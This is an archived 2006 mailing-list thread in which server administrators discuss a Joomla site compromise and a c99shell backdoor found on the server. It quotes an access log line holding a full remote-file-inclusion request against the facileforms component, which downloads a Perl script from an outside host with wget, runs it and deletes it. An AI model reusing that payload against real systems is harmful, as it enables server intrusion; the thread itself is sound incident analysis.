As an aside, these exploits like systems with register_globals=ON, and if
they can't get through to your system, the bombard it with DDoS attacks.
All it takes is about 200-300 hits on the system and MySQL will get swamped.
> -----Original Message-----
> From: Gavin Nelmes-Crocker [mailto:gavin (at mark) web-hoster.co.uk]
> Sent: Tuesday, September 19, 2006 6:37 PM
> To: coba-e (at mark) bluequartz.org
> Subject: [coba-e:07092] Re: Odd events for September 19, 2006
>
> >Yes, I have a problem, but not one with Joomla. I am using the
> >latest version of Joomla. If the issue was with Joomla there
> >would be entries in the error_log and access_log that showed
> >which exploit was being used.
>
> Okay try another tack - When we looked at the site on our server that had
> a
> problem we found a php file that should not have been there, looking at it
> it appears to be c99shell - I haven't found out too much about it but its
> not good!
>
> In our case I'm sure it got there by Joomla
>
> Here is what I find in the logs for the same time as the file we found
>
> julia.combios.es - - [15/Sep/2006:13:07:21 +0100] "GET
> /component/option,com_facileforms/components/com_facileforms/facileforms.f
> ra
> me.php?ff_compath=http://www.kariwuhrer.net/forums/help.gif?&cmd=cd%20/tmp
> /;
> wget%20http://www.freewebtown.com/al00rs/v6.txt;p?&cmd=cd%20/tmp/;wget%20h
> tt
> p://www.freewebtown.com/al00rs/v6.txt;perl%20v6.txt;rm%20-rf%20v6*
> HTTP/1.0"
> 200 11120 "-" "Mozilla/5.0"
>
> I need to analyse the logs more carefully as this isn't the file that is
> on
> the system but I think it is the perl script they were running
>
> I suspect I will be making some complaints to ISP's shortly!
>
> In your case I'm not sure what you have or how/why it got there but I
> would
> be looking very carefully for something that shouldn't be there as it is
> rare for a BQ box to go wild like that without someone trying to do
> something they shouldn't be.
>
> Gavin